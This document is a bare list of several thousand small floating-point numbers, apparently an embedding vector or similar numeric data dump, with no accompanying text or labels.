-0.010753253474831581, -0.014714174903929234, 0.011943819932639599, -0.009837433695793152, 0.008463703095912933, 0.009158200584352016, 0.014279160648584366, 0.002205600030720234, 0.0145844342187047, -0.005876511801034212, -0.011798814870417118, 0.018224818632006645, -0.01322596799582243, -0.0012878719717264175, 0.0035049195867031813, 0.026925109326839447, 0.007528803776949644, -0.001675187493674457, 0.025047678500413895, 0.005704795476049185, 0.006845754571259022, -0.004701209720224142, 0.012867271900177002, -0.0007102375384420156, -0.015355248935520649, 0.02037699520587921, 0.003482024185359478, -0.014118892140686512, -0.011852237395942211, -0.010577721521258354, 0.01628633216023445, 0.007952370680868626, -0.003930394537746906, -0.03583909198641777, 0.0032645168248564005, -0.03199264779686928, 0.013668614439666271, -0.0013126754201948643, 0.013500713743269444, 0.0031385915353894234, 0.0025738358963280916, -0.009577951394021511, 0.005346099380403757, 0.0076585449278354645, 0.0017219324363395572, 0.00515148788690567, 0.010058756917715073, -0.015416303649544716, -0.0310768261551857, -0.030191533267498016, -0.01330228615552187, -0.0006744632846675813, -0.003503011539578438, 0.015546045266091824, -0.0017343341605737805, 0.006376396864652634, -0.011638546362519264, -0.0022971818689256907, -0.040509771555662155, -0.017934808507561684, -0.005185830872505903, -0.0007445807568728924, 0.018087446689605713, 0.016042115166783333, -0.008913981728255749, 0.001699036918580532, 0.007288401015102863, 0.008005793206393719, 0.007410510443150997, -0.0037758497055619955, 0.030405225232243538, 0.010867730714380741, 0.005700979847460985, 0.0054147858172655106, -0.011234058998525143, 0.00612073065713048, 0.006277183070778847, -0.000619609490968287, 0.003983817063271999, -0.008799504488706589, 0.015858950093388557, -0.011119581758975983, -0.02658930793404579, -0.017003726214170456, -0.011050894856452942, 0.006437451578676701, -0.004743184428662062, -0.010524298995733261, -0.037243347615003586, -0.0017963428981602192, 0.025108732283115387, 0.01159275509417057, 0.0038235485553741455, 0.004914900753647089, -0.0021884283050894737, -0.0049454281106591225, 0.0009563641506247222, -0.0009458703570999205, 0.00610165111720562, 0.001450048410333693, -0.01804165542125702, 0.010966945439577103, 0.00913530495017767, 0.00420514028519392, -0.0462183840572834, -0.016271069645881653, 0.00155880197416991, -0.012050664983689785, -0.00621612835675478, 0.004876741673797369, 0.004159349482506514, -0.015622363425791264, 0.0014681740431115031, -0.004590548109263182, 0.02939782291650772, 0.015034711919724941, 0.004598179832100868, -0.008570549078285694, -0.010051124729216099, -0.007937107235193253, -0.0042204041965305805, -0.0010035861050710082, -0.012737530283629894, 0.0011972439242526889, -0.01781269907951355, 0.01999540440738201, 0.008135534822940826, 0.0027989749796688557, -0.024895042181015015, -0.0065404814667999744, 0.00313477567397058, -0.021796517074108124, 0.0036957154516130686, -0.0015664338134229183, 0.0001861451892182231, 0.03199264779686928, -0.017904281616210938, 0.010905890725553036, 0.025673488155007362, 0.015088135376572609, 0.016103168949484825, 0.00154830829706043, 0.025215579196810722, -0.01886589266359806, -0.009074250236153603, -0.012439888902008533, 0.010180866345763206, -0.010486139915883541, -0.005113328341394663, 0.023399202153086662, 0.02136913500726223, -0.006418372038751841, 0.017018988728523254, 0.03339690342545509, -0.01804165542125702, -0.01917116530239582, -0.017003726214170456, -0.0409371554851532, 0.001750551862642169, -0.018759047612547874, 0.014492851682007313, 0.011959083378314972, 0.009448209777474403, 0.011005104519426823, 0.005468208808451891, 0.0008552423678338528, 0.013790723867714405, 0.016942670568823814, -0.0004622029373422265, 0.006475610658526421, 0.0023944878485053778, 0.01895747520029545, -0.022849710658192635, 0.017705854028463364, 0.007906579412519932, 0.003167211078107357, -0.03669385612010956, -0.004464622586965561, -0.010959313251078129, 0.0018936487613245845, -0.008891086094081402, 0.03293899446725845, 0.016271069645881653, 0.0009797366801649332, 0.010096915997564793, -0.005700979847460985, 0.002146453130990267, -0.005845984444022179, -0.012325411662459373, 0.015813158825039864, 0.018163764849305153, 0.004720289260149002, 0.003342743031680584, -0.020285414531826973, 0.004663050174713135, -0.036327529698610306, -0.010585353709757328, -0.0031462234910577536, 0.0037624940741807222, 0.017446372658014297, 0.0033637306187301874, 0.013050435110926628, 0.015393408946692944, 0.0017944348510354757, 0.004949244204908609, 0.016042115166783333, 0.008784240111708641, -0.017766909673810005, 0.01984276808798313, 0.0075822267681360245, 0.004468438681215048, 0.0022418510634452105, 0.004430279601365328, 0.0326031930744648, -0.017629535868763924, -0.010715094394981861, -0.02970309741795063, -0.013989151455461979, 0.006319158244878054, 0.008646867237985134, 0.0014443245017901063, -0.012836744077503681, 0.020193831995129585, 0.01659160666167736, -0.015645258128643036, -0.015645258128643036, 0.01750742644071579, -0.007193003315478563, -0.011455382220447063, 0.015546045266091824, 0.0034190614242106676, 0.007570778951048851, 0.006448899395763874, 0.012737530283629894, -0.00002559347376518417, 0.00630771042779088, 0.0007421958143822849, -0.031412627547979355, 0.000197115950868465, 0.007860789075493813, -0.0027989749796688557, 0.0049835871905088425, 0.0032378053292632103, -0.009990070015192032, -0.020270150154829025, 0.01940012164413929, -0.008669762872159481, -0.010722726583480835, 0.003340835217386484, 0.017522690817713737, -0.013073330745100975, 0.005472024902701378, 0.0033675467129796743, 0.010997472330927849, 0.0033255715388804674, -0.001694267033599317, -0.00837212149053812, 0.009494001045823097, -0.007112869061529636, 0.0070136552676558495, -0.007814997807145119, 0.02136913500726223, -0.03886129707098007, 0.002182704396545887, 0.01118063647300005, -0.01653055101633072, -0.005540711339563131, -0.0044722543098032475, -0.006822859402745962, -0.013172544538974762, 0.0023219853173941374, -0.018835365772247314, 0.025123996660113335, 0.00213118945248425, 0.011302745901048183, -0.003388534067198634, 0.010035861283540726, -0.023902902379631996, -0.012592525221407413, -0.0022208637092262506, 0.006826675031334162, 0.0023486968129873276, 0.007139580324292183, 0.002228495432063937, 0.021765990182757378, 0.005643741227686405, -0.010997472330927849, 0.0004097340570297092, -0.01712583564221859, -0.0075402515940368176, -0.0015740656526759267, 0.0027436441741883755, -0.0008313928847201169, -0.010707462206482887, -0.020789114758372307, 0.005483472719788551, -0.016179487109184265, -0.014683648012578487, 0.020575422793626785, -0.012233829125761986, -0.0065786405466496944, -0.031198935583233833, -0.01243225671350956, -0.016637397930026054, -0.002379224169999361, 0.005552159156650305, -0.0011753024300560355, 0.027383018285036087, 0.012065929360687733, 0.002726472681388259, 0.017293734475970268, -0.0014013954205438495, 0.0015702497912570834, -0.0028085147496312857, -0.03278635814785957, 0.001679957378655672, -0.012676475569605827, -0.011012735776603222, 0.011737760156393051, 0.0021044781897217035, 0.021124916151165962, -0.0032797805033624172, 0.01576736755669117, -0.013256494887173176, 0.015553677454590797, -0.011974346823990345, -0.014691280201077461, -0.05736086145043373, 0.037182293832302094, -0.004514229483902454, -0.017904281616210938, 0.0021063860040158033, 0.008326330222189426, -0.016805298626422882, -0.014805757440626621, -0.009036091156303883, 0.011661441996693611, 0.005201094783842564, -0.010364030487835407, -0.010524298995733261, -0.0004960692021995783, 0.031717900186777115, -0.008158430457115173, -0.0008581043221056461, -0.013180176727473736, -0.019644340500235558, 0.005159119609743357, 0.0043539609760046005, 0.000356788223143667, -0.025856653228402138, -0.0002395680348854512, 0.0064221881330013275, -0.011562228202819824, -0.016545815393328667, -0.0041669812053442, 0.004624891094863415, 0.005479656625539064, -0.019751185551285744, -0.004189876839518547, 0.0042776428163051605, 0.020132776349782944, -0.007837893441319466, 0.008761345408856869, 0.0181942917406559, -0.01621001400053501, -0.007135764695703983, -0.0017219324363395572, 0.01031060703098774, 0.003176750848069787, -0.004705025348812342, -0.01918642967939377, 0.00608257157728076, -0.010829571634531021, -0.01534761767834425, 0.012981749139726162, 0.0106082484126091, -0.006780884228646755, -0.0070479982532560825, 0.0015549861127510667, 0.0018793389899656177, -0.003333203261718154, -0.014889707788825035, -0.009692428633570671, -0.004479886498302221, 0.012852007523179054, 0.0011676705908030272, 0.0008237610454671085, -0.008433176204562187, -0.01560709998011589, -0.010890626348555088, -0.009234518744051456, 0.005762034561485052, -0.01645423285663128, -0.00037849124055355787, 0.005006482824683189, 0.00024445715826004744, -0.005407154094427824, 0.004060135688632727, 0.0033637306187301874, 0.031092090532183647, 0.013462554663419724, 0.02613139897584915, -0.019461175426840782, 0.004468438681215048, 0.013928096741437912, -0.005769666284322739, -0.0030622731428593397, -0.0030050345230847597, -0.01659160666167736, 0.00009641152428230271, 0.009112409316003323, 0.02832936681807041, 0.023246565833687782, -0.004254747182130814, 0.03023732453584671, 0.0009081882308237255, -0.018240083009004593, 0.005735322833061218, -0.007860789075493813, 0.003842628328129649, -0.005063721444457769, -0.0019298999104648829, 0.006506138015538454, -0.018621673807501793, -0.013500713743269444, -0.012004874646663666, 0.0005566468462347984, 0.009112409316003323, -0.013386236503720284, 0.009074250236153603, -0.012638316489756107, 0.0011514528887346387, -0.0033580067101866007, 0.012958853505551815, -0.019278012216091156, -0.012287252582609653, -0.006902993656694889, 0.0019146362319588661, -0.024895042181015015, 0.028665166348218918, 0.003026022110134363, 0.016484761610627174, 0.0001813753042370081, -0.014279160648584366, -0.013065699487924576, -0.004594363737851381, 0.0015836055390536785, 0.00050227006431669, 0.0049263485707342625, -0.000004382342012831941, 0.01849956437945366, 0.007685256656259298, -0.01253910269588232, -0.015362881124019623, -0.006036780308932066, -0.005239253863692284, -0.02129281684756279, -0.0064985062927007675, 0.016271069645881653, -0.018301136791706085, -0.016561079770326614, 0.0065557449124753475, 0.016316860914230347, 0.0008051584591157734, -0.012264356948435307, 0.0033828101586550474, -0.03629700094461441, 0.01865220069885254, 0.0023811322171241045, 0.019964877516031265, 0.011753023602068424, 0.002280010376125574, -0.00032172948704101145, -0.008975036442279816, 0.02226969040930271, 0.01359992753714323, -0.0021693487651646137, -0.012813848443329334, -0.013981519266963005, 0.017324263229966164, -0.008105007000267506, -0.009745851159095764, -0.021018069237470627, -0.013813618570566177, -0.00008055161742959172, -0.024376077577471733, -0.008555285632610321, -0.0021941522136330605, 0.03324426710605621, -0.004857662133872509, -0.009722956456243992, -0.0007860788609832525, 0.0019451635889708996, 0.011852237395942211, 0.01636265218257904, 0.009295573458075523, -0.0023200775031000376, 0.011974346823990345, 0.0033026759047061205, -0.025352951139211655, 0.009043723344802856, -0.038464441895484924, 0.017095306888222694, 0.021582825109362602, 0.003983817063271999, 0.02001066878437996, 0.0009024643222801387, 0.009722956456243992, 0.02213231846690178, 0.010860099457204342, -0.011111949570477009, -0.004674497991800308, -0.006891545839607716, 0.016255805268883705, 0.017186889424920082, 0.007616570219397545, 0.007589858490973711, 0.014309688471257687, 0.014408902265131474, -0.011546964757144451, -0.006761804688721895, 0.007906579412519932, 0.016179487109184265, -0.005720059387385845, -0.009692428633570671, 0.002291457960382104, 0.0008476105285808444, 0.0049034529365599155, 0.014157051220536232, -0.005788745824247599, 0.004518045578151941, 0.0021407294552773237, 0.0023067216388881207, 0.01037929393351078, 0.01523314043879509, -0.00027021460118703544, 0.007021286990493536, -0.021949153393507004, 0.019140638411045074, 0.012142247520387173, -0.005582686513662338, -0.011546964757144451, -0.004922532942146063, -0.005971909966319799, 0.009738219901919365, -0.0024765299167484045, 0.0025223209522664547, 0.02629929967224598, -0.014828653074800968, 0.025734543800354004, 0.0019222680712118745, 0.030634179711341858, 0.002720748772844672, -0.002449818653985858, 0.022559700533747673, -0.006311526522040367, -0.0014834377216175199, 0.014302056282758713, -0.0014834377216175199, 0.01356176845729351, -0.014218105934560299, 0.0029554276261478662, 0.012371201999485493, -0.028146201744675636, 0.014630225487053394, 0.009913751855492592, -0.010867730714380741, -0.02410132996737957, -0.015286562964320183, 0.016026850789785385, 0.01034876611083746, -0.0227428637444973, -0.009501633234322071, 0.004384488333016634, 0.005700979847460985, -0.04008239135146141, -0.0029954947531223297, -0.0012850100174546242, 0.029504669830203056, 0.004228035919368267, 0.010638776235282421, 0.011821710504591465, 0.01743110828101635, -0.02417764812707901, 0.014782861806452274, 0.015622363425791264, -0.030252588912844658, -0.002999310614541173, -0.0002578128769528121, 0.021918626502156258, 0.00303174601867795, -0.019125375896692276, -0.011150108650326729, -0.0035926857963204384, -0.0055139996111392975, -0.009112409316003323, 0.011050894856452942, 0.007338007912039757, 0.01549262274056673, -0.01933906599879265, -0.03281688317656517, 0.012508575804531574, 0.02721511945128441, -0.006280999165028334, 0.004067767411470413, 0.009730587713420391, -0.006922073196619749, 0.012806217186152935, 0.018545355647802353, 0.0035869618877768517, -0.008204220794141293, 0.0004600564716383815, 0.015194980427622795, 0.007700520101934671, -0.006506138015538454, 0.015706313773989677, -0.008570549078285694, -0.0048309508711099625, -0.006246655713766813, -0.02599402517080307, 0.022025471553206444, 0.006490874569863081, 0.020346468314528465, 0.003697623498737812, -0.011348536238074303, -0.0026997611857950687, 0.005372811108827591, -0.0020109880715608597, -0.011302745901048183, -0.0069754961878061295, -0.019537493586540222, -0.008517126552760601, -0.02614666149020195, 0.02985573373734951, -0.0015597559977322817, 0.0017705854261294007, 0.007891315966844559, 0.006246655713766813, -0.017293734475970268, -0.0014443245017901063, -0.004548572935163975, 0.008166061714291573, -0.008967404253780842, 0.0011619466822594404, 0.010577721521258354, -0.010516666807234287, 0.004697393625974655, -0.019430648535490036, -0.0008247150108218193, 0.023399202153086662, -0.013042803853750229, 0.006219944451004267, 0.027413547039031982, -0.006036780308932066, 0.000577157421503216, 0.0181942917406559, -0.01901852898299694, -0.005559790879487991, 0.017461635172367096, 0.019064320251345634, 0.009867960587143898, 0.011539332568645477, -0.011089053936302662, 0.013760196045041084, -0.005689532030373812, -0.00517438305541873, 0.001441462547518313, -0.003197738202288747, 0.0024059356655925512, -0.000014689789168187417, -0.00198046094737947, 0.00626955134794116, -0.009974806569516659, 0.01227962039411068, -0.0069754961878061295, 0.016622133553028107, -0.0009892764501273632, -0.005201094783842564, 0.011585123836994171, 0.02622297964990139, 0.003911314532160759, 0.0185606200248003, -0.0015931453090161085, 0.0034610365983098745, -0.0001670656056376174, -0.023093929514288902, -0.005819273181259632, 0.007204451132565737, -0.007612754125148058, -0.0025471244007349014, -0.00209303037263453, 0.04789738729596138, 0.018972737714648247, 0.012722266837954521, 0.008898718282580376, -0.0010779964504763484, -0.006906809285283089, -0.012020138092339039, -0.0037434143014252186, 0.0010789504740387201, 0.010325871407985687, 0.0076203858479857445, -0.006303894799202681, 0.0035640662536025047, -0.030451016500592232, -0.003388534067198634, -0.01133327279239893, -0.009532160125672817, -0.02811567485332489, -0.011768287047743797, -0.007734863553196192, 0.028451476246118546, -0.00710523733869195, 0.00841028057038784, -0.0071472120471298695, -0.006334422156214714, 0.009974806569516659, 0.012684107758104801, 0.014347847551107407, -0.0066167996264994144, -0.015256035141646862, -0.043531980365514755, 0.0075822267681360245, -0.015378144569694996, 0.018469037488102913, -0.017599008977413177, -0.01833166368305683, -0.013073330745100975, 0.01985803060233593, 0.030267851427197456, -0.016423705965280533, -0.005571238696575165, 0.029275713488459587, -0.010501403361558914, 0.0075974902138113976, 0.01015797071158886, -0.019278012216091156, 0.0017705854261294007, 0.021857570856809616, 0.014187579043209553, 0.0007841709302738309, 0.011585123836994171, -0.004369224887341261, 0.002802790841087699, 0.024956095963716507, 0.006074939388781786, -0.006029148586094379, -0.015935268253087997, 0.013706773519515991, 0.018911683931946754, 0.008204220794141293, 0.02478819526731968, -0.01473707053810358, -0.02810041233897209, 0.02181178145110607, 0.02530715987086296, 0.027260910719633102, -0.004872925579547882, -0.010654039680957794, -0.013309918344020844, -0.0005218266160227358, 0.01140959095209837, -0.009219255298376083, -0.013867042027413845, 0.010463244281709194, -0.011829341761767864, 0.0019709209445863962, -0.015011817216873169, 0.020285414531826973, 0.016790034249424934, -0.005880327895283699, 0.026711417362093925, -0.02265128307044506, -0.005887959618121386, 0.024803459644317627, 0.006532849743962288, -0.01155459601432085, 0.003661372233182192, -0.040051862597465515, 0.005006482824683189, -0.006922073196619749, 0.0333358496427536, 0.01865220069885254, -0.012943590059876442, -0.0032835963647812605, -0.005975725594907999, 0.00207585864700377, 0.013157281093299389, -0.011623282916843891, 0.0017982508288696408, -0.020285414531826973, 0.030252588912844658, 0.009142937138676643, 0.0043348814360797405, 0.014576802030205727, 0.0005294584552757442, -0.011783551424741745, -0.00731129664927721, 0.0014042573748156428, -0.009028458967804909, -0.003581237979233265, -0.013325181789696217, 0.00021488381025847048, -0.005945198237895966, -0.00304128578864038, 0.005449129268527031, 0.004010528791695833, -0.00017875185585580766, -0.010409820824861526, 0.007685256656259298, 0.0025318607222288847, 0.018926948308944702, 0.004685945808887482, -0.01428679283708334, -0.022788655012845993, 0.0022590227890759706, -0.03339690342545509, 0.019613811746239662, -0.03339690342545509, -0.02123176120221615, -0.0016856812871992588, 0.0015940992161631584, -0.0021788885351270437, -0.0023658685386180878, 0.002755091991275549, 0.006410740315914154, -0.022330746054649353, 0.006189417093992233, 0.004609627649188042, 0.003493471769616008, 0.01848430186510086, 0.02144545316696167, 0.020132776349782944, -0.0018621673807501793, 0.006738909054547548, -0.003121420042589307, -0.01865220069885254, 0.011844606138765812, 0.012905430980026722, 0.0015740656526759267, 0.013905201107263565, 0.023017609491944313, -0.008662131614983082, 0.020636478438973427, 0.002379224169999361, 0.0008967404719442129, -0.0009043723111972213, 0.004689761903136969, 0.0008027735166251659, 0.03281688317656517, -0.014241001568734646, -0.007338007912039757, 0.0019728289917111397, 0.005075169261544943, 0.02681826427578926, 0.008066847920417786, -0.0005714335711672902, -0.007448669523000717, -0.012852007523179054, -0.006811411585658789, 0.012142247520387173, -0.001675187493674457, -0.0036213051062077284, 0.005933750886470079, 0.007097605150192976, -0.003976185340434313, 0.015950532630085945, 0.007643281482160091, -0.026482462882995605, 0.021689672023057938, -0.007452485617250204, -0.004747000522911549, 0.003243529237806797, -0.001300273695960641, 0.009860329329967499, 0.011653809808194637, -0.0030222060158848763, 0.0021502692252397537, -0.022849710658192635, -0.011356168426573277, 0.011058527044951916, -0.006960232276469469, -0.006086387205868959, 0.009219255298376083, 0.0013222151901572943, 0.013180176727473736, 0.0024536345154047012, 0.02001066878437996, -0.009860329329967499, 0.0009372845524922013, 0.012043033726513386, -0.021048597991466522, 0.01773638091981411, -0.007326560094952583, -0.0018650293350219727, -0.0159200057387352, -0.005685715936124325, 0.0189422108232975, -0.00943294633179903, 0.011791182681918144, 0.027077745646238327, -0.011638546362519264, -0.0074639334343373775, 0.0246355589479208, 0.007158659864217043, 0.017324263229966164, -0.009303205646574497, -0.00018149454263038933, -0.005918486975133419, -0.010325871407985687, 0.013996782712638378, 0.00422421982511878, -0.008852927014231682, -0.01575210504233837, 0.012210933491587639, 0.0031576710753142834, -0.0024841618724167347, 0.0048881894908845425, -0.00829580333083868, -0.024498185142874718, 0.00830343458801508, -0.021506506949663162, 0.012516207061707973, -0.024910304695367813, -0.012813848443329334, 0.013630455359816551, -0.0024326469283550978, 0.0004908223054371774, 0.0031996462494134903, 0.009142937138676643, 0.018301136791706085, 0.010371661745011806, -0.01356176845729351, 0.01576736755669117, 0.009730587713420391, -0.007475381251424551, 0.005441497545689344, 0.0052621494978666306, 0.0007188233430497348, 0.01261542085558176, -0.01779743656516075, -0.0052430699579417706, 0.003907498903572559, 0.020667005330324173, -0.00811263918876648, -0.010814308188855648, -0.0011476370273157954, 0.010799044743180275, -0.01557657215744257, 0.014500483870506287, -0.012455152347683907, -0.010997472330927849, -0.011203532107174397, -0.017080044373869896, -0.008387384936213493, -0.0004145039711147547, 0.023887639865279198, 0.018087446689605713, -0.007586042862385511, -0.00204533152282238, 0.01560709998011589, 0.01561473123729229, 0.01607264205813408, -0.022605491802096367, -0.017690589651465416, -0.026925109326839447, 0.0013536964543163776, 0.0025738358963280916, -0.020575422793626785, 0.0043348814360797405, -0.011455382220447063, 0.025932971388101578, -0.002919176360592246, 0.02326182834804058, 0.008242380805313587, -0.0010779964504763484, 0.02486451342701912, -0.006632063537836075, 0.005678084213286638, 0.01607264205813408, 0.02333814650774002, 0.0064603472128510475, -0.00898266863077879, -0.005124776158481836, 0.03669385612010956, -0.004369224887341261, 0.023673947900533676, -0.01636265218257904, 0.0006582456408068538, -0.005914670880883932, 0.021720198914408684, -0.026726681739091873, -0.020499104633927345, -0.005368995014578104, 0.011279850266873837, -0.02918413281440735, -0.005269781220704317, -0.00037109790719114244, 0.025887180119752884, 0.002234219340607524, 0.019232220947742462, 0.013157281093299389, 0.0023105377331376076, 0.009600847028195858, -0.005216358229517937, -0.02228495478630066, -0.008120271377265453, 0.003205370157957077, 0.0005957600078545511, -0.005349915474653244, 0.0038025612011551857, 0.005708611570298672, -0.024345548823475838, 0.0035984094720333815, 0.0071281325072050095, -0.0013909017434343696, 0.006448899395763874, 0.02295655570924282, -0.0038273646496236324, -0.012340675108134747, -0.009684797376394272, 0.008280539885163307, -0.006788515951484442, 0.0028371340595185757, 0.00524688558652997, 0.008204220794141293, 0.005307940300554037, 0.00799816194921732, 0.004079215228557587, -0.009013195522129536, 0.00015597560559399426, -0.006239023990929127, -0.006979311816394329, 0.009379523806273937, -0.006105466745793819, -0.003693807404488325, -0.001572157721966505, -0.005971909966319799, 0.028161466121673584, 0.019003266468644142, 0.022315481677651405, 0.0011819802457466722, 0.008532389998435974, -0.03394639492034912, 0.019949613139033318, -0.010951681062579155, -0.0035354469437152147, -0.01643897034227848, 0.0028466740623116493, -0.0008719370234757662, -0.007662361022084951, 0.0035793299321085215, -0.002989770844578743, 0.001957565313205123, -0.0015292286407202482, -0.0040753991343081, -0.009295573458075523, -0.01345492247492075, -0.02932150475680828, -0.006605351809412241, -0.01682056114077568, 0.01614896021783352, -0.006223760545253754, -0.013905201107263565, 0.007101421244442463, 0.013836514204740524, -0.0004121190286241472, -0.0024803460109978914, -0.027489865198731422, 0.0015196888707578182, -0.001131419325247407, 0.007952370680868626, 0.0003646585391834378, 0.0030298379715532064, -0.02926045097410679, -0.009692428633570671, -0.00018018281843978912, -0.012294883839786053, -0.004514229483902454, -0.011600387282669544, -0.0049835871905088425, 0.01825534552335739, -0.0030126662459224463, 0.0026081791147589684, -0.01462259329855442, 0.016026850789785385, 0.03229792043566704, -0.0028218706138432026, -0.0015712036984041333, -0.004747000522911549, -0.02532242424786091, 0.025123996660113335, 0.0031366837210953236, -0.005567422602325678, 0.026696154847741127, -0.0001485822576796636, -0.02636035345494747, 0.006322974339127541, 0.0024555425625294447, 0.015278930775821209, 0.005651372950524092, -0.008341594599187374, -0.005784929729998112, -0.003661372233182192, -0.009715324267745018, -0.005307940300554037, 0.012302516028285027, 0.009524528868496418, 0.029886260628700256, 0.0034514968283474445, 0.028146201744675636, 0.04456990957260132, -0.011226427741348743, -0.0024517264682799578, 0.01712583564221859, 0.0048500304110348225, 0.0037395984400063753, 0.027383018285036087, 0.020880697295069695, 0.013729669153690338, -0.008837663568556309, 0.010325871407985687, 0.009379523806273937, 0.021918626502156258, -0.016805298626422882, 0.009425314143300056, 0.00029072517645545304, 0.008105007000267506, 0.0021846124436706305, -0.00924215093255043, -0.007021286990493536, -0.00921162310987711, -0.00621231272816658, 0.002638706471771002, -0.008211852982640266, -0.003995264880359173, -0.003911314532160759, 0.024833986535668373, 0.0064794267527759075, 0.0035144593566656113, -0.026711417362093925, 0.005754402372986078, -0.014164683409035206, -0.023994484916329384, 0.028466738760471344, 0.0025642961263656616, -0.021857570856809616, -0.04124242812395096, 0.010829571634531021, 0.005044641904532909, 0.004479886498302221, 0.003064181189984083, 0.0019537494517862797, 0.001967105083167553, -0.015706313773989677, 0.010089283809065819, -0.006723645608872175, -0.012371201999485493, -0.022849710658192635, -0.005952830426394939, -0.017476899549365044, -0.00026401373906992376, -0.004399752244353294, -0.016805298626422882, 0.0034057057928293943, -0.013538872823119164, 0.01827060990035534, -0.014683648012578487, 0.00042905216105282307, 0.002619626931846142, -0.011463014408946037, -0.022254427894949913, 0.005613213870674372, -0.015225508250296116, -0.006838122848421335, -0.007845524698495865, 0.009379523806273937, -0.02796303853392601, 0.0010999380610883236, -0.014683648012578487, 0.0011714864522218704, 0.011943819932639599, -0.0006787562160752714, 0.00010845551150850952, -0.013325181789696217, 0.021567562595009804, -0.00015776431246194988, 0.001351788523606956, 0.00515148788690567, -0.005876511801034212, -0.007723415736109018, -0.00829580333083868, -0.01817902736365795, -0.005876511801034212, -0.010936417616903782, -0.004125006031244993, -0.013996782712638378, 0.02871095761656761, -0.009715324267745018, 0.005124776158481836, -0.006254287902265787, 0.006777068134397268, -0.0025032414123415947, -0.002676865551620722, 0.0005795423639938235, 0.020728060975670815, 0.0032492531463503838, 0.011234058998525143, -0.011089053936302662, 0.01257726177573204, 0.011661441996693611, -0.013577031902968884, -0.0021712565794587135, -0.010249552316963673, 0.0037147949915379286, 0.010936417616903782, 0.02849726751446724, 0.012516207061707973, -0.01651528850197792, 0.008005793206393719, 0.008654499426484108, 0.023368675261735916, 0.006670222617685795, -0.010585353709757328, -0.020880697295069695, -0.010211393237113953, 0.016103168949484825, -0.007593674585223198, -0.016255805268883705, 0.013065699487924576, -0.01432495191693306, 0.022071262821555138, -0.003911314532160759, -0.018774310126900673, 0.02039225958287716, 0.008051584474742413, 0.0020434234756976366, -0.006704566068947315, -0.00027617698651738465, -0.02297182008624077, -0.010486139915883541, 0.005529263522475958, -0.0074639334343373775, -0.008845294825732708, -0.0076203858479857445, -0.012935957871377468, 0.006799963768571615, -0.0031385915353894234, -0.034068506211042404, -0.002510873368009925, 0.007208266761153936, 0.015393408946692944, 0.005933750886470079, -0.002398303709924221, -0.029229922220110893, -0.004422647412866354, 0.02037699520587921, 0.02318551018834114, 0.02446765825152397, 0.0011390511645004153, -0.005731507204473019, -0.002337248995900154, -0.006937336642295122, 0.009837433695793152, 0.0017705854261294007, -0.005735322833061218, 0.008929245173931122, -0.007303664926439524, -0.011012735776603222, -0.0031099722255021334, 0.007952370680868626, 0.05424707382917404, -0.012592525221407413, 0.01720215380191803, -0.025276632979512215, -0.024147121235728264, -0.01999540440738201, -0.016240542754530907, -0.03016100637614727, 0.014302056282758713, -0.00003315077628940344, -0.015072871930897236, 0.01447758823633194, 0.013836514204740524, -0.004674497991800308, -0.006964048370718956, 0.0076203858479857445, 0.007280769292265177, -0.005025562364608049, -0.008761345408856869, -0.03046628087759018, 0.01454627513885498, 0.010058756917715073, 0.008501863107085228, 0.03571698069572449, 0.014851548708975315, -0.024223439395427704, -0.010188497602939606, -0.00917346403002739, 0.008463703095912933, -0.0030489175114780664, 0.03776231408119202, -0.002012896118685603, 0.02364342100918293, 0.0034953798167407513, 0.0017267023213207722, 0.007006023079156876, 0.009616110473871231, 0.021338606253266335, 0.010974576696753502, 0.005094248801469803, -0.019461175426840782, 0.006513770204037428, 0.00032077552168630064, -0.013134385459125042, -0.028054621070623398, 0.013790723867714405, -0.009860329329967499, -0.00902082771062851, 0.007185371592640877, 0.011463014408946037, 0.0106082484126091, 0.011310377158224583, -0.002886741189286113, 0.004682130180299282, -0.01247041579335928, -0.0017400580691173673, -0.009181096218526363, -0.02668089047074318, -0.01265357993543148, 0.020102249458432198, -0.013035171665251255, -0.016576342284679413, 0.009570319205522537, 0.010829571634531021, -0.010539562441408634, -0.011524069122970104, -0.010142707265913486, -0.002781803486868739, 0.004121190402656794, 0.01557657215744257, -0.005182015243917704, -0.012989381328225136, -0.016026850789785385, -0.02796303853392601, 0.008082112297415733, -0.025597169995307922, 0.017843227833509445, 0.007807365618646145, -0.0043768566101789474, -0.026802999898791313, -0.00935662817209959, 0.002581467851996422, 0.012981749139726162, 0.014416533522307873, 0.0070899734273552895, 0.016881616786122322, -0.0083339624106884, 0.00314431544393301, -0.014042573980987072, 0.015553677454590797, 0.007265505846589804, -0.007364719640463591, -0.011089053936302662, -0.014630225487053394, 0.008784240111708641, -0.005933750886470079, 0.00932610034942627, 0.01155459601432085, 0.0009659039205871522, 0.02228495478630066, 0.011882765218615532, 0.005235437769442797, -0.013660982251167297, 0.0013861317420378327, -0.003083260729908943, -0.021414924412965775, 0.00924215093255043, -0.022483382374048233, -0.02092648856341839, 0.015454462729394436, -0.005807825364172459, 0.013432026840746403, -0.001243988866917789, -0.01151643693447113, 0.008768976666033268, -0.005639925133436918, 0.005185830872505903, -0.008883454836905003, 0.010241921059787273, -0.0030718131456524134, -0.022468117997050285, -0.0009096191497519612, 0.003636568784713745, 0.0038884193636476994, 0.03275582939386368, 0.0006625385722145438, -0.010135075077414513, 0.005861248355358839, 0.009974806569516659, 0.003571698209270835, -0.0013956716284155846, 0.007097605150192976, 0.01605737768113613, 0.02903149463236332, 0.007765390910208225, 0.01622527837753296, -0.010592984966933727, 0.010646408423781395, 0.004781343974173069, 0.01129511371254921, -0.02054489590227604, 0.04060135409235954, -0.005239253863692284, -0.010135075077414513, -0.008807135745882988, 0.025123996660113335, 0.0033541908487677574, 0.004590548109263182, 0.006097835022956133, 0.0014920234680175781, 0.002449818653985858, 0.014645488932728767, 0.016790034249424934, -0.009722956456243992, -0.004498966038227081, 0.0004641108971554786, 0.024833986535668373, 0.01569104939699173, 0.02584138885140419, -0.004193692468106747, 0.015401040203869343, 0.01621001400053501, -0.0032301736064255238, 0.00031791356741450727, 0.0021006623283028603, 0.024681350216269493, 0.0032416214235126972, -0.0066167996264994144, 0.022147580981254578, 0.003590777749195695, -0.006815227679908276, -0.0016627857694402337, -0.0019060504855588078, -0.003655648324638605, 0.01871325634419918, 0.03745704144239426, 0.020422786474227905, 0.0049034529365599155, 0.015629995614290237, 0.01337860431522131, 0.0008771838620305061, 0.009722956456243992, -0.01940012164413929, -0.016683189198374748, -0.011127213947474957, -0.011195899918675423, 0.0009787826566025615, -0.014920234680175781, 0.019049057736992836, 0.006811411585658789, -0.006490874569863081, -0.01166907325387001, -0.02037699520587921, -0.009104777127504349, -0.019506966695189476, 0.008395017124712467, 0.01246278453618288, 0.016469497233629227, 0.0040753991343081, 